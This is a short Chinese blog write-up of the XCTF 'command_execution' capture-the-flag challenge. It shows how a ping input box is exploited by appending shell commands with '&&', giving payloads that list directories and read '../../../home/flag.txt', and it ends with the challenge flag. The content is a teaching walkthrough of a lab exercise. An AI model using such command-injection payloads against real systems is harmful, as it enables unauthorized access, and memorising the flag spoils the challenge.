攻防世界command_execution

1.观察题目

image-20260121234059811

发现要求输入的地址

对地址进行猜测比如:127.0.0.1(本地回环地址)或192.168.x.x(私有局域网地址)

image-20260122000643798

用127.0.0.1尝试有输出

2.铺垫

&&:前面命令成功了,才执行后面 例如:xx&&ls

/:系统目录分隔符 例如:ls /flag

空格:命令和参数之间的分隔符,必须有!,例如:ls /

ls:列出当前目录的文件

cat:读取文件内容 cat /flag

find:搜索文件 find / -name "flag"

env:看系统环境变量

whoami:看当前用户,看看后期是否要提高系统权限

./:当前文件夹

../:上一级文件夹

3.对ping输入内容进行不断尝试

127.0.0.1&&ls

image-20260122004959704

127.0.0.1&&ls ../

image-20260122005129806

不断对上一级文件夹进行查看,尝试获取有效信息

127.0.0.1&&ls ../../

image-20260122005224322

127.0.0.1&&ls ../../../

image-20260122005306057

通常flag会藏在home,tmp,var中,对每个进行尝试,不怕出错

127.0.0.1&&ls ../../../home

image-20260122005445100

发现目标flag文件

127.0.0.1&&cat ../../../home/flag.txt

image-20260122005616775

获取flag

flag:cyberpeace{b564f02d7046668f4b8882a6e0cf12e2}

posted @ 2026-01-22 00:58  地方管委主任  阅读(0)  评论(0)    收藏  举报